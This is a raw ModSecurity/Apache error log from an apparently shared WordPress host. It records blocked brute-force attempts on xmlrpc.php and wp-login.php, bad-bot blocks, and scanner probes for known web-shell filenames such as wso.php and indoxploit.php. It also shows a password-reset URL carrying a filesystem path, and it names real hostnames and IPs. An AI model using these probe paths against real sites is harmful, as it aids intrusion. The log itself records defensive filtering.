[Tue May 26 15:43:57.372823 2026] [security2:error] [pid 733610:tid 733793] [client 103.153.130.62:62161] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyZcLL_4PasUNKBsfq2gAAADU"]
[Tue May 26 15:43:58.446576 2026] [security2:error] [pid 733610:tid 733751] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyZsLL_4PasUNKBsfq8wAAAAs"]
[Tue May 26 15:44:01.082644 2026] [security2:error] [pid 733610:tid 733746] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyacLL_4PasUNKBsfrRwAAAAY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218846&moderation-hash=fc4784e8af093403ee41686b1bd3a923
[Tue May 26 15:44:01.496054 2026] [security2:error] [pid 733610:tid 733828] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyacLL_4PasUNKBsfrSgAAAFg"]
[Tue May 26 15:44:01.886612 2026] [security2:error] [pid 733610:tid 733841] [client 85.204.70.118:47132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "thriveswift.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVyacLL_4PasUNKBsfragAAAGU"]
[Tue May 26 15:44:01.959578 2026] [security2:error] [pid 733610:tid 733776] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyacLL_4PasUNKBsfraQAAACQ"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1218846&moderation-hash=fc4784e8af093403ee41686b1bd3a923
[Tue May 26 15:44:02.038354 2026] [security2:error] [pid 733610:tid 733779] [client 185.191.171.13:19090] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVyasLL_4PasUNKBsfrbAAAACc"]
[Tue May 26 15:44:02.038565 2026] [security2:error] [pid 733610:tid 733779] [client 185.191.171.13:19090] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahVyasLL_4PasUNKBsfrbAAAACc"]
[Tue May 26 15:44:02.666803 2026] [security2:error] [pid 733610:tid 733763] [client 85.204.70.118:34876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyasLL_4PasUNKBsfreAAAABc"]
[Tue May 26 15:44:02.989532 2026] [security2:error] [pid 733610:tid 733838] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyasLL_4PasUNKBsfrfgAAAGI"]
[Tue May 26 15:44:04.415701 2026] [security2:error] [pid 733610:tid 733809] [client 85.204.70.118:34892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVybMLL_4PasUNKBsfrvAAAAEU"]
[Tue May 26 15:44:04.415799 2026] [security2:error] [pid 733610:tid 733809] [client 85.204.70.118:34892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVybMLL_4PasUNKBsfrvAAAAEU"]
[Tue May 26 15:44:04.757075 2026] [security2:error] [pid 733610:tid 733766] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVybMLL_4PasUNKBsfrtgAAABo"]
[Tue May 26 15:44:06.795552 2026] [security2:error] [pid 733610:tid 733813] [client 143.110.243.118:32920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/radio.php"] [unique_id "ahVybsLL_4PasUNKBsfr-AAAAEk"]
[Tue May 26 15:44:06.814326 2026] [security2:error] [pid 733610:tid 733614] [remote 163.223.13.54:50022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.13.223.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVybsLL_4PasUNKBsfr9wAAKgM"]
[Tue May 26 15:44:07.314907 2026] [security2:error] [pid 733610:tid 733867] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVybsLL_4PasUNKBsfr_gAAAH8"]
[Tue May 26 15:44:07.923215 2026] [security2:error] [pid 733610:tid 733787] [client 103.153.130.62:62436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyb8LL_4PasUNKBsfsDgAAAC8"]
[Tue May 26 15:44:07.923368 2026] [security2:error] [pid 733610:tid 733787] [client 103.153.130.62:62436] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyb8LL_4PasUNKBsfsDgAAAC8"]
[Tue May 26 15:44:08.211441 2026] [security2:error] [pid 733610:tid 733849] [client 143.110.243.118:32932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/content.php"] [unique_id "ahVycMLL_4PasUNKBsfsFgAAAG0"]
[Tue May 26 15:44:08.435412 2026] [security2:error] [pid 733610:tid 733771] [client 166.1.186.201:4941] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyb8LL_4PasUNKBsfsDAAAAB8"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 15:44:08.922720 2026] [security2:error] [pid 733610:tid 733818] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVycMLL_4PasUNKBsfsHgAAAE4"]
[Tue May 26 15:44:09.610731 2026] [security2:error] [pid 733610:tid 733769] [client 143.110.243.118:32942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-admin/shapes.php"] [unique_id "ahVyccLL_4PasUNKBsfsPQAAAB0"]
[Tue May 26 15:44:10.305340 2026] [security2:error] [pid 733610:tid 733784] [client 143.110.243.118:32956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/XxX.php"] [unique_id "ahVycsLL_4PasUNKBsfsUwAAACw"]
[Tue May 26 15:44:12.022534 2026] [http2:info] [pid 745492:tid 745492] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:44:12.106615 2026] [security2:error] [pid 733610:tid 733786] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyc8LL_4PasUNKBsfsqAAAAC4"]
[Tue May 26 15:44:12.301431 2026] [security2:error] [pid 733610:tid 733778] [client 138.59.206.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVydMLL_4PasUNKBsfszwAAACY"], referer: https://www.anujtradingco.com/
[Tue May 26 15:44:12.933731 2026] [security2:error] [pid 733610:tid 733845] [client 143.110.243.118:32960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/Marvins.php"] [unique_id "ahVydMLL_4PasUNKBsfs4AAAAGk"]
[Tue May 26 15:44:13.433332 2026] [security2:error] [pid 733610:tid 733798] [client 138.59.206.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVydcLL_4PasUNKBsfs6wAAADo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467072&moderation-hash=72f44dbcdc0c737e3cf7427fd1cc1d45
[Tue May 26 15:44:13.592742 2026] [security2:error] [pid 733610:tid 733822] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVydcLL_4PasUNKBsfs4wAAAFI"]
[Tue May 26 15:44:15.589834 2026] [security2:error] [pid 733610:tid 733769] [client 45.88.189.220:59486] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "wrapmachines.com"] [uri "/ajax/captcha_code_file.php"] [unique_id "ahVyd8LL_4PasUNKBsftSgAAAB0"]
[Tue May 26 15:44:15.818912 2026] [security2:error] [pid 733610:tid 733779] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyd8LL_4PasUNKBsftSAAAACc"]
[Tue May 26 15:44:16.005966 2026] [security2:error] [pid 745492:tid 745697] [client 143.110.243.118:48846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-includes/css/modules.php"] [unique_id "ahVyeImEQglTmoWcfxJn_gAAAM0"]
[Tue May 26 15:44:16.265602 2026] [security2:error] [pid 745492:tid 745698] [client 45.88.189.220:59488] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVyeImEQglTmoWcfxJoAAAAAM4"]
[Tue May 26 15:44:17.330439 2026] [security2:error] [pid 745492:tid 745730] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyeImEQglTmoWcfxJoEgAAAO4"]
[Tue May 26 15:44:17.949376 2026] [security2:error] [pid 733610:tid 733717] [remote 193.42.61.12:58640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVyecLL_4PasUNKBsftZAAAKmo"]
[Tue May 26 15:44:18.218510 2026] [security2:error] [pid 745492:tid 745749] [client 103.153.130.62:62715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyeomEQglTmoWcfxJoIQAAAQE"]
[Tue May 26 15:44:18.218643 2026] [security2:error] [pid 745492:tid 745749] [client 103.153.130.62:62715] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyeomEQglTmoWcfxJoIQAAAQE"]
[Tue May 26 15:44:19.113080 2026] [security2:error] [pid 733610:tid 733826] [client 223.123.35.44:35764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyesLL_4PasUNKBsftbgAAAFY"]
[Tue May 26 15:44:19.113259 2026] [security2:error] [pid 733610:tid 733826] [client 223.123.35.44:35764] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyesLL_4PasUNKBsftbgAAAFY"]
[Tue May 26 15:44:19.788089 2026] [security2:error] [pid 745492:tid 745675] [client 177.234.143.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVye4mEQglTmoWcfxJoNwAAALc"], referer: https://www.anujtradingco.com/
[Tue May 26 15:44:19.897908 2026] [security2:error] [pid 733610:tid 733756] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVye8LL_4PasUNKBsftdgAAABA"]
[Tue May 26 15:44:19.955885 2026] [security2:error] [pid 733610:tid 733710] [remote 74.7.241.58:35060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVye8LL_4PasUNKBsftfQAAAWM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Emails
[Tue May 26 15:44:20.356386 2026] [security2:error] [pid 745492:tid 745695] [client 177.234.143.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVyfImEQglTmoWcfxJoRgAAAMs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1511262&moderation-hash=09d360719787d80c5e37cacbda8b7337
[Tue May 26 15:44:20.614490 2026] [security2:error] [pid 745492:tid 745723] [client 74.7.241.150:37022] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "restmoll.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVyfImEQglTmoWcfxJoSgAA528"]
[Tue May 26 15:44:21.579616 2026] [security2:error] [pid 745492:tid 745736] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyfYmEQglTmoWcfxJoVAAAAPQ"]
[Tue May 26 15:44:21.831048 2026] [security2:error] [pid 745492:tid 745730] [client 177.234.143.212:45516] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVyfYmEQglTmoWcfxJoVgAAAO4"], referer: https://anujtradingco.com
[Tue May 26 15:44:22.206118 2026] [security2:error] [pid 745492:tid 745626] [client 143.110.243.118:48856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/olux.php"] [unique_id "ahVyfomEQglTmoWcfxJoXwAAAIY"]
[Tue May 26 15:44:23.440508 2026] [security2:error] [pid 745492:tid 745649] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVye4mEQglTmoWcfxJoMAAAAJ0"]
[Tue May 26 15:44:24.268524 2026] [security2:error] [pid 745492:tid 745669] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyf4mEQglTmoWcfxJocAAAALE"]
[Tue May 26 15:44:25.148614 2026] [security2:error] [pid 745492:tid 745709] [client 143.110.243.118:43110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/indoxploit.php"] [unique_id "ahVygYmEQglTmoWcfxJohgAAANk"]
[Tue May 26 15:44:26.139636 2026] [security2:error] [pid 745492:tid 745737] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVygYmEQglTmoWcfxJokAAAAPU"]
[Tue May 26 15:44:28.317694 2026] [security2:error] [pid 745492:tid 745634] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyg4mEQglTmoWcfxJorAAAAI4"]
[Tue May 26 15:44:28.631377 2026] [security2:error] [pid 745492:tid 745698] [client 103.153.130.62:62991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyhImEQglTmoWcfxJowQAAAM4"]
[Tue May 26 15:44:28.631513 2026] [security2:error] [pid 745492:tid 745698] [client 103.153.130.62:62991] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyhImEQglTmoWcfxJowQAAAM4"]
[Tue May 26 15:44:30.292865 2026] [security2:error] [pid 745492:tid 745747] [client 41.193.252.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyhYmEQglTmoWcfxJo0QAAAP8"]
[Tue May 26 15:44:30.347002 2026] [security2:error] [pid 733610:tid 733789] [client 143.110.243.118:43118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wso.php"] [unique_id "ahVyhsLL_4PasUNKBsfuFgAAADE"]
[Tue May 26 15:44:30.436431 2026] [security2:error] [pid 745492:tid 745721] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyhomEQglTmoWcfxJo0wAAAOU"]
[Tue May 26 15:44:31.636137 2026] [access_compat:error] [pid 745492:tid 745639] [client 88.151.32.54:0] AH01797: client denied by server configuration: /home1/freshrlj/murugaa.in/wp-content/uploads/woocommerce_uploads/
[Tue May 26 15:44:31.636194 2026] [access_compat:error] [pid 745492:tid 745671] [client 88.151.32.54:0] AH01797: client denied by server configuration: /home1/freshrlj/murugaa.in/wp-content/uploads/wc-logs/
[Tue May 26 15:44:31.685216 2026] [security2:error] [pid 745492:tid 745742] [client 88.151.32.54:56584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.32.151.88.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVyh4mEQglTmoWcfxJo6QAAAPo"]
[Tue May 26 15:44:32.558991 2026] [security2:error] [pid 745492:tid 745707] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyiImEQglTmoWcfxJo9gAAANc"]
[Tue May 26 15:44:32.762289 2026] [security2:error] [pid 733610:tid 733822] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyh8LL_4PasUNKBsfuLQAAAFI"]
[Tue May 26 15:44:34.556359 2026] [security2:error] [pid 745492:tid 745746] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyiomEQglTmoWcfxJpHgAAAP4"]
[Tue May 26 15:44:36.615047 2026] [security2:error] [pid 745492:tid 745694] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyjImEQglTmoWcfxJpQwAAAMo"]
[Tue May 26 15:44:37.014599 2026] [security2:error] [pid 745492:tid 745663] [client 88.151.32.54:56592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyi4mEQglTmoWcfxJpOQAAAKs"]
[Tue May 26 15:44:38.789487 2026] [security2:error] [pid 733610:tid 733865] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyjsLL_4PasUNKBsfuVQAAAH0"]
[Tue May 26 15:44:38.815861 2026] [security2:error] [pid 745492:tid 745742] [client 88.151.32.54:56592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyjYmEQglTmoWcfxJpaQAAAPo"]
